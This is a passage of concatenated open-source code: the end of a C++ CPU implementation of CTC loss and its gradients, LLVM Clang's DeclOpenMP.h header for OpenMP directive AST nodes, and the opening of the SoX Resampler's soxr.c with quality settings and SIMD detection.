alphas[i] = std::log(probs[labels[i]]);
}
for(int t = 1; t < T; ++t) {
int remain = (S / 2) + repeats - (T - t);
if(remain >= 0)
start += s_inc[remain];
if(t <= (S / 2) + repeats)
end += e_inc[t - 1];
int startloop = start;
int idx1 = t * S, idx2 = (t - 1) * S, idx3 = t * (alphabet_size_ * minibatch_);
if (start == 0) {
alphas[idx1] = alphas[idx2] + std::log(probs[blank_label_ + idx3]);
startloop += 1;
}
for(int i = startloop; i < end; ++i) {
ProbT prev_sum = ctc_helper::log_plus<ProbT>()(alphas[i + idx2], alphas[(i-1) + idx2]);
// Skip two if not on blank and not on repeat.
if (labels[i] != blank_label_ && i != 1 && labels[i] != labels[i-2])
prev_sum = ctc_helper::log_plus<ProbT>()(prev_sum, alphas[(i-2) + idx2]);
alphas[i + idx1] = prev_sum + std::log(probs[labels[i] + idx3]);
}
}
ProbT loglike = ctc_helper::neg_inf<ProbT>();
for(int i = start; i < end; ++i) {
loglike = ctc_helper::log_plus<ProbT>()(loglike, alphas[i + (T - 1) * S]);
}
return loglike;
}
// Starting from T, we sweep backward over the alpha array computing one column
// of betas as we go. At each position we can update product alpha * beta and then
// sum into the gradient associated with each label.
// NOTE computes gradient w.r.t UNNORMALIZED final layer activations.
// Assumed passed in grads are already zeroed!
template<typename ProbT>
ProbT CpuCTC<ProbT>::compute_betas_and_grad(ProbT* grad, const ProbT* const probs,
ProbT log_partition, int repeats,
int S, int T, const int* const e_inc,
const int* const s_inc,
const int* const labels,
ProbT* alphas,
ProbT* betas,
ProbT* output) {
int start = S > 1 ? (S - 2) : 0,
end = (T > (S / 2) + repeats) ? S : S-1;
std::fill(output, output + alphabet_size_, ctc_helper::neg_inf<ProbT>());
//set the starting values in the beta column at the very right edge
for (int i = start; i < end; ++i) {
betas[i] = std::log(probs[labels[i] + (T - 1) * (alphabet_size_ * minibatch_)]);
//compute alpha * beta in log space at this position in (S, T) space
alphas[i + (T - 1) * S] += betas[i];
//update the gradient associated with this label
//essentially performing a reduce-by-key in a sequential manner
output[labels[i]] =
ctc_helper::log_plus<ProbT>()(alphas[i + (T - 1) * S], output[labels[i]]);
}
//update the gradient wrt to each unique label
for (int i = 0; i < alphabet_size_; ++i) {
int idx3 = (T - 1) * alphabet_size_ * minibatch_ + i;
if (output[i] == 0.0 || output[i] == ctc_helper::neg_inf<ProbT>() ||
probs[idx3] == 0.0) {
grad[idx3] = probs[idx3];
} else {
grad[idx3] = probs[idx3] - std::exp(output[i] -
std::log(probs[idx3]) - log_partition);
}
}
//loop from the second to last column all the way to the left
for(int t = T - 2; t >= 0; --t) {
int remain = (S / 2) + repeats - (T - t);
if(remain >= -1)
start -= s_inc[remain + 1];
if(t < (S / 2) + repeats)
end -= e_inc[t];
int endloop = end == S ? end - 1 : end;
int idx1 = t * S, idx3 = t * (alphabet_size_ * minibatch_);
std::fill(output, output + alphabet_size_, ctc_helper::neg_inf<ProbT>());
for(int i = start; i < endloop; ++i) {
ProbT next_sum = ctc_helper::log_plus<ProbT>()(betas[i], betas[(i+1)]);
// Skip two if not on blank and not on repeat.
if (labels[i] != blank_label_ && i != (S-2) && labels[i] != labels[i+2]){
next_sum = ctc_helper::log_plus<ProbT>()(next_sum, betas[(i+2)]);
}
betas[i] = next_sum + std::log(probs[labels[i] + idx3]);
//compute alpha * beta in log space
alphas[i + idx1] += betas[i];
//update the gradient associated with this label
output[labels[i]] =
ctc_helper::log_plus<ProbT>()(alphas[i + idx1], output[labels[i]]);
}
if (end == S) {
betas[(S-1)] = betas[(S-1)] + std::log(probs[blank_label_ + idx3]);
alphas[(S-1) + idx1] += betas[(S-1)];
output[labels[S-1]] =
ctc_helper::log_plus<ProbT>()(alphas[S-1 + idx1], output[labels[S-1]]);
}
//go over the unique labels and compute the final grad
// wrt to each one at this time step
for (int i = 0; i < alphabet_size_; ++i) {
if (output[i] == 0.0 || output[i] == ctc_helper::neg_inf<ProbT>() ||
probs[idx3] == 0.0) {
grad[idx3] = probs[idx3];
} else {
grad[idx3] = probs[idx3] - std::exp(output[i] -
std::log(probs[idx3]) - log_partition);
}
++idx3;
}
}
ProbT loglike = ctc_helper::neg_inf<ProbT>();
for(int i = start; i < end; ++i) {
loglike = ctc_helper::log_plus<ProbT>()(loglike, betas[i]);
}
return loglike;
}
template<typename ProbT>
ctcStatus_t
CpuCTC<ProbT>::cost_and_grad(const ProbT* const probs,
ProbT *grads,
ProbT *costs,
const int* const flat_labels,
const int* const label_lengths,
const int* const input_lengths) {
if (probs == nullptr ||
grads == nullptr ||
costs == nullptr ||
flat_labels == nullptr ||
label_lengths == nullptr ||
input_lengths == nullptr
)
return CTC_STATUS_INVALID_VALUE;
//ProbT* probs = static_cast<ProbT *>(workspace_);
int maxT = *std::max_element(input_lengths, input_lengths + minibatch_);
size_t bytes_used = 0; //sizeof(ProbT) * minibatch_ * alphabet_size_ * maxT;
//per minibatch memory
size_t per_minibatch_bytes = 0;
int maxL = *std::max_element(label_lengths, label_lengths + minibatch_);;
int maxS = 2 * maxL + 1;
//output
per_minibatch_bytes += sizeof(float) * alphabet_size_;
//alphas
per_minibatch_bytes += sizeof(float) * maxS * maxT;
//betas
per_minibatch_bytes += sizeof(float) * maxS;
//labels w/blanks, e_inc, s_inc
per_minibatch_bytes += 3 * sizeof(int) * maxS;
#pragma omp parallel for
for (int mb = 0; mb < minibatch_; ++mb) {
const int T = input_lengths[mb]; // Length of utterance (time)
const int L = label_lengths[mb]; // Number of labels in transcription
bool mb_status;
std::tie(costs[mb], mb_status) =
cost_and_grad_kernel(grads + mb * alphabet_size_,
probs + mb * alphabet_size_,
flat_labels + std::accumulate(label_lengths, label_lengths + mb, 0),
T, L, mb,
bytes_used + mb * per_minibatch_bytes);
}
return CTC_STATUS_SUCCESS;
}
template<typename ProbT>
ctcStatus_t CpuCTC<ProbT>::score_forward(const ProbT* const probs,
ProbT* costs,
const int* const flat_labels,
const int* const label_lengths,
const int* const input_lengths) {
if (probs == nullptr ||
costs == nullptr ||
flat_labels == nullptr ||
label_lengths == nullptr ||
input_lengths == nullptr
)
return CTC_STATUS_INVALID_VALUE;
//ProbT* probs = static_cast<ProbT *>(workspace_);
int maxT = *std::max_element(input_lengths, input_lengths + minibatch_);
size_t bytes_used = 0; //sizeof(ProbT) * minibatch_ * alphabet_size_ * maxT;
//per minibatch memory
size_t per_minibatch_bytes = 0;
int maxL = *std::max_element(label_lengths, label_lengths + minibatch_);
int maxS = 2 * maxL + 1;
//output
per_minibatch_bytes += sizeof(float) * alphabet_size_;
//alphas
per_minibatch_bytes += sizeof(float) * maxS * maxT;
//betas
per_minibatch_bytes += sizeof(float) * maxS;
//labels w/blanks, e_inc, s_inc
per_minibatch_bytes += 3 * sizeof(int) * maxS;
#pragma omp parallel for
for (int mb = 0; mb < minibatch_; ++mb) {
const int T = input_lengths[mb]; // Length of utterance (time)
const int L = label_lengths[mb]; // Number of labels in transcription
const int S = 2*L + 1; // Number of labels with blanks
CpuCTC_metadata ctcm(L, S, T, mb, alphabet_size_, workspace_,
bytes_used + mb * per_minibatch_bytes, blank_label_,
flat_labels + std::accumulate(label_lengths, label_lengths + mb, 0));
if (L + ctcm.repeats > T)
costs[mb] = ProbT(0);
else {
costs[mb] = -compute_alphas(probs + mb * alphabet_size_, ctcm.repeats, S, T,
ctcm.e_inc, ctcm.s_inc, ctcm.labels_w_blanks,
ctcm.alphas);
}
}
return CTC_STATUS_SUCCESS;
}
|
DeclOpenMP.h | //===- DeclOpenMP.h - Classes for representing OpenMP directives -*- C++ -*-===//
//
// Part of the LLVM Project, under the Apache License v2.0 with LLVM Exceptions.
// See https://llvm.org/LICENSE.txt for license information.
// SPDX-License-Identifier: Apache-2.0 WITH LLVM-exception
//
//===----------------------------------------------------------------------===//
///
/// \file
/// This file defines OpenMP nodes for declarative directives.
///
//===----------------------------------------------------------------------===//
#ifndef LLVM_CLANG_AST_DECLOPENMP_H
#define LLVM_CLANG_AST_DECLOPENMP_H
#include "clang/AST/Decl.h"
#include "clang/AST/Expr.h"
#include "clang/AST/ExternalASTSource.h"
#include "clang/AST/OpenMPClause.h"
#include "clang/AST/Type.h"
#include "llvm/ADT/ArrayRef.h"
#include "llvm/Support/TrailingObjects.h"
namespace clang {
/// This represents '#pragma omp threadprivate ...' directive.
/// For example, in the following, both 'a' and 'A::b' are threadprivate:
///
/// \code
/// int a;
/// #pragma omp threadprivate(a)
/// struct A {
/// static int b;
/// #pragma omp threadprivate(b)
/// };
/// \endcode
///
class OMPThreadPrivateDecl final
: public Decl,
private llvm::TrailingObjects<OMPThreadPrivateDecl, Expr *> {
friend class ASTDeclReader;
friend TrailingObjects;
unsigned NumVars;
virtual void anchor();
OMPThreadPrivateDecl(Kind DK, DeclContext *DC, SourceLocation L) :
Decl(DK, DC, L), NumVars(0) { }
ArrayRef<const Expr *> getVars() const {
return llvm::makeArrayRef(getTrailingObjects<Expr *>(), NumVars);
}
MutableArrayRef<Expr *> getVars() {
return MutableArrayRef<Expr *>(getTrailingObjects<Expr *>(), NumVars);
}
void setVars(ArrayRef<Expr *> VL);
public:
static OMPThreadPrivateDecl *Create(ASTContext &C, DeclContext *DC,
SourceLocation L,
ArrayRef<Expr *> VL);
static OMPThreadPrivateDecl *CreateDeserialized(ASTContext &C,
unsigned ID, unsigned N);
typedef MutableArrayRef<Expr *>::iterator varlist_iterator;
typedef ArrayRef<const Expr *>::iterator varlist_const_iterator;
typedef llvm::iterator_range<varlist_iterator> varlist_range;
typedef llvm::iterator_range<varlist_const_iterator> varlist_const_range;
unsigned varlist_size() const { return NumVars; }
bool varlist_empty() const { return NumVars == 0; }
varlist_range varlists() {
return varlist_range(varlist_begin(), varlist_end());
}
varlist_const_range varlists() const {
return varlist_const_range(varlist_begin(), varlist_end());
}
varlist_iterator varlist_begin() { return getVars().begin(); }
varlist_iterator varlist_end() { return getVars().end(); }
varlist_const_iterator varlist_begin() const { return getVars().begin(); }
varlist_const_iterator varlist_end() const { return getVars().end(); }
static bool classof(const Decl *D) { return classofKind(D->getKind()); }
static bool classofKind(Kind K) { return K == OMPThreadPrivate; }
};
/// This represents '#pragma omp declare reduction ...' directive.
/// For example, in the following, declared reduction 'foo' for types 'int' and
/// 'float':
///
/// \code
/// #pragma omp declare reduction (foo : int,float : omp_out += omp_in) \
/// initializer (omp_priv = 0)
/// \endcode
///
/// Here 'omp_out += omp_in' is a combiner and 'omp_priv = 0' is an initializer.
class OMPDeclareReductionDecl final : public ValueDecl, public DeclContext {
// This class stores some data in DeclContext::OMPDeclareReductionDeclBits
// to save some space. Use the provided accessors to access it.
public:
enum InitKind {
CallInit, // Initialized by function call.
DirectInit, // omp_priv(<expr>)
CopyInit // omp_priv = <expr>
};
private:
friend class ASTDeclReader;
/// Combiner for declare reduction construct.
Expr *Combiner = nullptr;
/// Initializer for declare reduction construct.
Expr *Initializer = nullptr;
/// In parameter of the combiner.
Expr *In = nullptr;
/// Out parameter of the combiner.
Expr *Out = nullptr;
/// Priv parameter of the initializer.
Expr *Priv = nullptr;
/// Orig parameter of the initializer.
Expr *Orig = nullptr;
/// Reference to the previous declare reduction construct in the same
/// scope with the same name. Required for proper templates instantiation if
/// the declare reduction construct is declared inside compound statement.
LazyDeclPtr PrevDeclInScope;
virtual void anchor();
OMPDeclareReductionDecl(Kind DK, DeclContext *DC, SourceLocation L,
DeclarationName Name, QualType Ty,
OMPDeclareReductionDecl *PrevDeclInScope);
void setPrevDeclInScope(OMPDeclareReductionDecl *Prev) {
PrevDeclInScope = Prev;
}
public:
/// Create declare reduction node.
static OMPDeclareReductionDecl *
Create(ASTContext &C, DeclContext *DC, SourceLocation L, DeclarationName Name,
QualType T, OMPDeclareReductionDecl *PrevDeclInScope);
/// Create deserialized declare reduction node.
static OMPDeclareReductionDecl *CreateDeserialized(ASTContext &C,
unsigned ID);
/// Get combiner expression of the declare reduction construct.
Expr *getCombiner() { return Combiner; }
const Expr *getCombiner() const { return Combiner; }
/// Get In variable of the combiner.
Expr *getCombinerIn() { return In; }
const Expr *getCombinerIn() const { return In; }
/// Get Out variable of the combiner.
Expr *getCombinerOut() { return Out; }
const Expr *getCombinerOut() const { return Out; }
/// Set combiner expression for the declare reduction construct.
void setCombiner(Expr *E) { Combiner = E; }
/// Set combiner In and Out vars.
void setCombinerData(Expr *InE, Expr *OutE) {
In = InE;
Out = OutE;
}
/// Get initializer expression (if specified) of the declare reduction
/// construct.
Expr *getInitializer() { return Initializer; }
const Expr *getInitializer() const { return Initializer; }
/// Get initializer kind.
InitKind getInitializerKind() const {
return static_cast<InitKind>(OMPDeclareReductionDeclBits.InitializerKind);
}
/// Get Orig variable of the initializer.
Expr *getInitOrig() { return Orig; }
const Expr *getInitOrig() const { return Orig; }
/// Get Priv variable of the initializer.
Expr *getInitPriv() { return Priv; }
const Expr *getInitPriv() const { return Priv; }
/// Set initializer expression for the declare reduction construct.
void setInitializer(Expr *E, InitKind IK) {
Initializer = E;
OMPDeclareReductionDeclBits.InitializerKind = IK;
}
/// Set initializer Orig and Priv vars.
void setInitializerData(Expr *OrigE, Expr *PrivE) {
Orig = OrigE;
Priv = PrivE;
}
/// Get reference to previous declare reduction construct in the same
/// scope with the same name.
OMPDeclareReductionDecl *getPrevDeclInScope();
const OMPDeclareReductionDecl *getPrevDeclInScope() const;
static bool classof(const Decl *D) { return classofKind(D->getKind()); }
static bool classofKind(Kind K) { return K == OMPDeclareReduction; }
static DeclContext *castToDeclContext(const OMPDeclareReductionDecl *D) {
return static_cast<DeclContext *>(const_cast<OMPDeclareReductionDecl *>(D));
}
static OMPDeclareReductionDecl *castFromDeclContext(const DeclContext *DC) {
return static_cast<OMPDeclareReductionDecl *>(
const_cast<DeclContext *>(DC));
}
};
/// This represents '#pragma omp declare mapper ...' directive. Map clauses are
/// allowed to use with this directive. The following example declares a user
/// defined mapper for the type 'struct vec'. This example instructs the fields
/// 'len' and 'data' should be mapped when mapping instances of 'struct vec'.
///
/// \code
/// #pragma omp declare mapper(mid: struct vec v) map(v.len, v.data[0:N])
/// \endcode
class OMPDeclareMapperDecl final : public ValueDecl, public DeclContext {
friend class ASTDeclReader;
/// Clauses assoicated with this mapper declaration
MutableArrayRef<OMPClause *> Clauses;
/// Mapper variable, which is 'v' in the example above
Expr *MapperVarRef = nullptr;
/// Name of the mapper variable
DeclarationName VarName;
LazyDeclPtr PrevDeclInScope;
virtual void anchor();
OMPDeclareMapperDecl(Kind DK, DeclContext *DC, SourceLocation L,
DeclarationName Name, QualType Ty,
DeclarationName VarName,
OMPDeclareMapperDecl *PrevDeclInScope)
: ValueDecl(DK, DC, L, Name, Ty), DeclContext(DK), VarName(VarName),
PrevDeclInScope(PrevDeclInScope) {}
void setPrevDeclInScope(OMPDeclareMapperDecl *Prev) {
PrevDeclInScope = Prev;
}
/// Sets an array of clauses to this mapper declaration
void setClauses(ArrayRef<OMPClause *> CL);
public:
/// Creates declare mapper node.
static OMPDeclareMapperDecl *Create(ASTContext &C, DeclContext *DC,
SourceLocation L, DeclarationName Name,
QualType T, DeclarationName VarName,
OMPDeclareMapperDecl *PrevDeclInScope);
/// Creates deserialized declare mapper node.
static OMPDeclareMapperDecl *CreateDeserialized(ASTContext &C, unsigned ID,
unsigned N);
/// Creates an array of clauses to this mapper declaration and intializes
/// them.
void CreateClauses(ASTContext &C, ArrayRef<OMPClause *> CL);
using clauselist_iterator = MutableArrayRef<OMPClause *>::iterator;
using clauselist_const_iterator = ArrayRef<const OMPClause *>::iterator;
using clauselist_range = llvm::iterator_range<clauselist_iterator>;
using clauselist_const_range =
llvm::iterator_range<clauselist_const_iterator>;
unsigned clauselist_size() const { return Clauses.size(); }
bool clauselist_empty() const { return Clauses.empty(); }
clauselist_range clauselists() {
return clauselist_range(clauselist_begin(), clauselist_end());
}
clauselist_const_range clauselists() const {
return clauselist_const_range(clauselist_begin(), clauselist_end());
}
clauselist_iterator clauselist_begin() { return Clauses.begin(); }
clauselist_iterator clauselist_end() { return Clauses.end(); }
clauselist_const_iterator clauselist_begin() const { return Clauses.begin(); }
clauselist_const_iterator clauselist_end() const { return Clauses.end(); }
/// Get the variable declared in the mapper
Expr *getMapperVarRef() { return MapperVarRef; }
const Expr *getMapperVarRef() const { return MapperVarRef; }
/// Set the variable declared in the mapper
void setMapperVarRef(Expr *MapperVarRefE) { MapperVarRef = MapperVarRefE; }
/// Get the name of the variable declared in the mapper
DeclarationName getVarName() { return VarName; }
/// Get reference to previous declare mapper construct in the same
/// scope with the same name.
OMPDeclareMapperDecl *getPrevDeclInScope();
const OMPDeclareMapperDecl *getPrevDeclInScope() const;
static bool classof(const Decl *D) { return classofKind(D->getKind()); }
static bool classofKind(Kind K) { return K == OMPDeclareMapper; }
static DeclContext *castToDeclContext(const OMPDeclareMapperDecl *D) {
return static_cast<DeclContext *>(const_cast<OMPDeclareMapperDecl *>(D));
}
static OMPDeclareMapperDecl *castFromDeclContext(const DeclContext *DC) {
return static_cast<OMPDeclareMapperDecl *>(const_cast<DeclContext *>(DC));
}
};
/// Pseudo declaration for capturing expressions. Also is used for capturing of
/// non-static data members in non-static member functions.
///
/// Clang supports capturing of variables only, but OpenMP 4.5 allows to
/// privatize non-static members of current class in non-static member
/// functions. This pseudo-declaration allows properly handle this kind of
/// capture by wrapping captured expression into a variable-like declaration.
class OMPCapturedExprDecl final : public VarDecl {
friend class ASTDeclReader;
void anchor() override;
OMPCapturedExprDecl(ASTContext &C, DeclContext *DC, IdentifierInfo *Id,
QualType Type, TypeSourceInfo *TInfo,
SourceLocation StartLoc)
: VarDecl(OMPCapturedExpr, C, DC, StartLoc, StartLoc, Id, Type, TInfo,
SC_None) {
setImplicit();
}
public:
static OMPCapturedExprDecl *Create(ASTContext &C, DeclContext *DC,
IdentifierInfo *Id, QualType T,
SourceLocation StartLoc);
static OMPCapturedExprDecl *CreateDeserialized(ASTContext &C, unsigned ID);
SourceRange getSourceRange() const override LLVM_READONLY;
// Implement isa/cast/dyncast/etc.
static bool classof(const Decl *D) { return classofKind(D->getKind()); }
static bool classofKind(Kind K) { return K == OMPCapturedExpr; }
};
/// This represents '#pragma omp requires...' directive.
/// For example
///
/// \code
/// #pragma omp requires unified_address
/// \endcode
///
class OMPRequiresDecl final
: public Decl,
private llvm::TrailingObjects<OMPRequiresDecl, OMPClause *> {
friend class ASTDeclReader;
friend TrailingObjects;
// Number of clauses associated with this requires declaration
unsigned NumClauses = 0;
virtual void anchor();
OMPRequiresDecl(Kind DK, DeclContext *DC, SourceLocation L)
: Decl(DK, DC, L), NumClauses(0) {}
/// Returns an array of immutable clauses associated with this requires
/// declaration
ArrayRef<const OMPClause *> getClauses() const {
return llvm::makeArrayRef(getTrailingObjects<OMPClause *>(), NumClauses);
}
/// Returns an array of clauses associated with this requires declaration
MutableArrayRef<OMPClause *> getClauses() {
return MutableArrayRef<OMPClause *>(getTrailingObjects<OMPClause *>(),
NumClauses);
}
/// Sets an array of clauses to this requires declaration
void setClauses(ArrayRef<OMPClause *> CL);
public:
/// Create requires node.
static OMPRequiresDecl *Create(ASTContext &C, DeclContext *DC,
SourceLocation L, ArrayRef<OMPClause *> CL);
/// Create deserialized requires node.
static OMPRequiresDecl *CreateDeserialized(ASTContext &C, unsigned ID,
unsigned N);
using clauselist_iterator = MutableArrayRef<OMPClause *>::iterator;
using clauselist_const_iterator = ArrayRef<const OMPClause *>::iterator;
using clauselist_range = llvm::iterator_range<clauselist_iterator>;
using clauselist_const_range = llvm::iterator_range<clauselist_const_iterator>;
unsigned clauselist_size() const { return NumClauses; }
bool clauselist_empty() const { return NumClauses == 0; }
clauselist_range clauselists() {
return clauselist_range(clauselist_begin(), clauselist_end());
}
clauselist_const_range clauselists() const {
return clauselist_const_range(clauselist_begin(), clauselist_end());
}
clauselist_iterator clauselist_begin() { return getClauses().begin(); }
clauselist_iterator clauselist_end() { return getClauses().end(); }
clauselist_const_iterator clauselist_begin() const {
return getClauses().begin();
}
clauselist_const_iterator clauselist_end() const {
return getClauses().end();
}
static bool classof(const Decl *D) { return classofKind(D->getKind()); }
static bool classofKind(Kind K) { return K == OMPRequires; }
};
} // end namespace clang
#endif
|
soxr.c | /* SoX Resampler Library Copyright (c) 2007-18 robs@users.sourceforge.net
* Licence for this file: LGPL v2.1 See LICENCE for details. */
#include <math.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
#include "soxr.h"
#include "data-io.h"
#include "internal.h"
#if AVUTIL_FOUND
#include <libavutil/cpu.h>
#endif
#if WITH_DEV_TRACE
#include <stdarg.h>
#include <stdio.h>
int _soxr_trace_level;
void _soxr_trace(char const * fmt, ...)
{
va_list args;
va_start(args, fmt);
vfprintf(stderr, fmt, args);
fputc('\n', stderr);
va_end(args);
}
#endif
char const * soxr_version(void)
{
return "libsoxr-" SOXR_THIS_VERSION_STR;
}
typedef void sample_t; /* float or double */
typedef void (* fn_t)(void);
typedef fn_t control_block_t[10];
#define resampler_input (*(sample_t * (*)(void *, sample_t * samples, size_t n))p->control_block[0])
#define resampler_process (*(void (*)(void *, size_t))p->control_block[1])
#define resampler_output (*(sample_t const * (*)(void *, sample_t * samples, size_t * n))p->control_block[2])
#define resampler_flush (*(void (*)(void *))p->control_block[3])
#define resampler_close (*(void (*)(void *))p->control_block[4])
#define resampler_delay (*(double (*)(void *))p->control_block[5])
#define resampler_sizes (*(void (*)(size_t * shared, size_t * channel))p->control_block[6])
#define resampler_create (*(char const * (*)(void * channel, void * shared, double io_ratio, soxr_quality_spec_t * q_spec, soxr_runtime_spec_t * r_spec, double scale))p->control_block[7])
#define resampler_set_io_ratio (*(void (*)(void *, double io_ratio, size_t len))p->control_block[8])
#define resampler_id (*(char const * (*)(void))p->control_block[9])
typedef void * resampler_t; /* For one channel. */
typedef void * resampler_shared_t; /* Between channels. */
typedef void (* deinterleave_t)(sample_t * * dest,
soxr_datatype_t data_type, void const * * src0, size_t n, unsigned ch);
typedef size_t (* interleave_t)(soxr_datatype_t data_type, void * * dest,
sample_t const * const * src, size_t, unsigned, unsigned long *);
struct soxr {
unsigned num_channels;
double io_ratio;
soxr_error_t error;
soxr_quality_spec_t q_spec;
soxr_io_spec_t io_spec;
soxr_runtime_spec_t runtime_spec;
void * input_fn_state;
soxr_input_fn_t input_fn;
size_t max_ilen;
resampler_shared_t shared;
resampler_t * resamplers;
control_block_t control_block;
deinterleave_t deinterleave;
interleave_t interleave;
void * * channel_ptrs;
size_t clips;
unsigned long seed;
int flushing;
};
#if WITH_CR32 || WITH_CR32S || WITH_CR64 || WITH_CR64S
#include "filter.h"
#else
#define lsx_to_3dB(x) ((x)/(x))
#endif
soxr_quality_spec_t soxr_quality_spec(unsigned long recipe, unsigned long flags)
{
soxr_quality_spec_t spec, * p = &spec;
unsigned q = recipe & 0xf; /* TODO: move to soxr-lsr.c: */
unsigned quality = q > SOXR_LSR2Q+2? SOXR_VHQ : q > SOXR_LSR2Q? SOXR_QQ : q;
double rej;
memset(p, 0, sizeof(*p));
if (quality > SOXR_PRECISIONQ) {
p->e = "invalid quality type";
return spec;
}
flags |= quality < SOXR_LSR0Q ? RESET_ON_CLEAR : 0;
p->phase_response = "\62\31\144"[(recipe & 0x30)>>4];
p->stopband_begin = 1;
p->precision =
quality == SOXR_QQ ? 0 :
quality <= SOXR_16_BITQ ? 16 :
quality <= SOXR_32_BITQ ? 4 + quality * 4 :
quality <= SOXR_LSR2Q ? 55 - quality * 4 : /* TODO: move to soxr-lsr.c */
0;
rej = p->precision * linear_to_dB(2.);
p->flags = flags;
if (quality <= SOXR_32_BITQ || quality == SOXR_PRECISIONQ) {
#define LOW_Q_BW0 (1385 / 2048.) /* 0.67625 rounded to be a FP exact. */
p->passband_end = quality == 1? LOW_Q_BW0 : 1 - .05 / lsx_to_3dB(rej);
if (quality <= 2)
p->flags &= ~SOXR_ROLLOFF_NONE, p->flags |= SOXR_ROLLOFF_MEDIUM;
}
else { /* TODO: move to soxr-lsr.c */
static float const bw[] = {.931f, .832f, .663f};
p->passband_end = bw[quality - SOXR_LSR0Q];
if (quality == SOXR_LSR2Q) {
p->flags &= ~SOXR_ROLLOFF_NONE;
p->flags |= SOXR_ROLLOFF_LSR2Q | SOXR_PROMOTE_TO_LQ;
}
}
if (recipe & SOXR_STEEP_FILTER)
p->passband_end = 1 - .01 / lsx_to_3dB(rej);
return spec;
}
char const * soxr_engine(soxr_t p)
{
return resampler_id();
}
size_t * soxr_num_clips(soxr_t p)
{
return &p->clips;
}
soxr_error_t soxr_error(soxr_t p)
{
return p->error;
}
soxr_runtime_spec_t soxr_runtime_spec(unsigned num_threads)
{
soxr_runtime_spec_t spec, * p = &spec;
memset(p, 0, sizeof(*p));
p->log2_min_dft_size = 10;
p->log2_large_dft_size = 17;
p->coef_size_kbytes = 400;
p->num_threads = num_threads;
return spec;
}
soxr_io_spec_t soxr_io_spec(
soxr_datatype_t itype,
soxr_datatype_t otype)
{
soxr_io_spec_t spec, * p = &spec;
memset(p, 0, sizeof(*p));
if ((itype | otype) >= SOXR_SPLIT * 2)
p->e = "invalid io datatype(s)";
else {
p->itype = itype;
p->otype = otype;
p->scale = 1;
}
return spec;
}
#if (WITH_CR32S && WITH_CR32) || (WITH_CR64S && WITH_CR64)
#if defined __GNUC__ && defined __x86_64__
#define CPUID(type, eax_, ebx_, ecx_, edx_) \
__asm__ __volatile__ ( \
"cpuid \n\t" \
: "=a" (eax_), "=b" (ebx_), "=c" (ecx_), "=d" (edx_) \
: "a" (type), "c" (0));
#elif defined __GNUC__ && defined __i386__
#define CPUID(type, eax_, ebx_, ecx_, edx_) \
__asm__ __volatile__ ( \
"mov %%ebx, %%edi \n\t" \
"cpuid \n\t" \
"xchg %%edi, %%ebx \n\t" \
: "=a" (eax_), "=D" (ebx_), "=c" (ecx_), "=d" (edx_) \
: "a" (type), "c" (0));
#elif defined _M_X64 && defined _MSC_VER && _MSC_VER > 1500
void __cpuidex(int CPUInfo[4], int info_type, int ecxvalue);
#pragma intrinsic(__cpuidex)
#define CPUID(type, eax_, ebx_, ecx_, edx_) do { \
int regs[4]; \
__cpuidex(regs, type, 0); \
eax_ = regs[0], ebx_ = regs[1], ecx_ = regs[2], edx_ = regs[3]; \
} while(0)
#elif defined _M_X64 && defined _MSC_VER
void __cpuidex(int CPUInfo[4], int info_type);
#pragma intrinsic(__cpuidex)
#define CPUID(type, eax_, ebx_, ecx_, edx_) do { \
int regs[4]; \
__cpuidex(regs, type); \
eax_ = regs[0], ebx_ = regs[1], ecx_ = regs[2], edx_ = regs[3]; \
} while(0)
#elif defined _M_IX86 && defined _MSC_VER
#define CPUID(type, eax_, ebx_, ecx_, edx_) \
__asm pushad \
__asm mov eax, type \
__asm xor ecx, ecx \
__asm cpuid \
__asm mov eax_, eax \
__asm mov ebx_, ebx \
__asm mov ecx_, ecx \
__asm mov edx_, edx \
__asm popad
#endif
#endif
#if WITH_CR32S && WITH_CR32
static bool cpu_has_simd32(void)
{
#if defined __x86_64__ || defined _M_X64
return true;
#elif defined __i386__ || defined _M_IX86
enum {SSE = 1 << 25, SSE2 = 1 << 26};
unsigned eax_, ebx_, ecx_, edx_;
CPUID(1, eax_, ebx_, ecx_, edx_);
return (edx_ & (SSE|SSE2)) != 0;
#elif defined AV_CPU_FLAG_NEON
return !!(av_get_cpu_flags() & AV_CPU_FLAG_NEON);
#else
return false;
#endif
}
static bool should_use_simd32(void)
{
char const * e;
return ((e = getenv("SOXR_USE_SIMD" )))? !!atoi(e) :
((e = getenv("SOXR_USE_SIMD32")))? !!atoi(e) : cpu_has_simd32();
}
#else
#define should_use_simd32() true
#endif
#if WITH_CR64S && WITH_CR64
#if defined __GNUC__
#define XGETBV(type, eax_, edx_) \
__asm__ __volatile__ ( \
".byte 0x0f, 0x01, 0xd0\n" \
: "=a"(eax_), "=d"(edx_) : "c" (type));
#elif defined _M_X64 && defined _MSC_FULL_VER && _MSC_FULL_VER >= 160040219
#include <immintrin.h>
#define XGETBV(type, eax_, edx_) do { \
union {uint64_t x; uint32_t y[2];} a = {_xgetbv(0)}; \
eax_ = a.y[0], edx_ = a.y[1]; \
} while(0)
#elif defined _M_IX86 && defined _MSC_VER
#define XGETBV(type, eax_, edx_) \
__asm pushad \
__asm mov ecx, type \
__asm _emit 0x0f \
__asm _emit 0x01 \
__asm _emit 0xd0 \
__asm mov eax_, eax \
__asm mov edx_, edx \
__asm popad
#else
#define XGETBV(type, eax_, edx_) eax_ = edx_ = 0
#endif
static bool cpu_has_simd64(void)
{
enum {OSXSAVE = 1 << 27, AVX = 1 << 28};
unsigned eax_, ebx_, ecx_, edx_;
CPUID(1, eax_, ebx_, ecx_, edx_);
if ((ecx_ & (OSXSAVE|AVX)) == (OSXSAVE|AVX)) {
XGETBV(0, eax_, edx_);
return (eax_ & 6) == 6;
}
return false;
}
static bool should_use_simd64(void)
{
char const * e;
return ((e = getenv("SOXR_USE_SIMD" )))? !!atoi(e) :
((e = getenv("SOXR_USE_SIMD64")))? !!atoi(e) : cpu_has_simd64();
}
#else
#define should_use_simd64() true
#endif
extern control_block_t
_soxr_rate32_cb,
_soxr_rate32s_cb,
_soxr_rate64_cb,
_soxr_rate64s_cb,
_soxr_vr32_cb;
static void runtime_num(char const * env_name,
int min, int max, unsigned * field)
{
char const * e = getenv(env_name);
if (e) {
int i = atoi(e);
if (i >= min && i <= max)
*field = (unsigned)i;
}
}
static void runtime_flag(char const * env_name,
unsigned n_bits, unsigned n_shift, unsigned long * flags)
{
char const * e = getenv(env_name);
if (e) {
int i = atoi(e);
unsigned long mask = (1UL << n_bits) - 1;
if (i >= 0 && i <= (int)mask)
*flags &= ~(mask << n_shift), *flags |= ((unsigned long)i << n_shift);
}
}
soxr_t soxr_create(
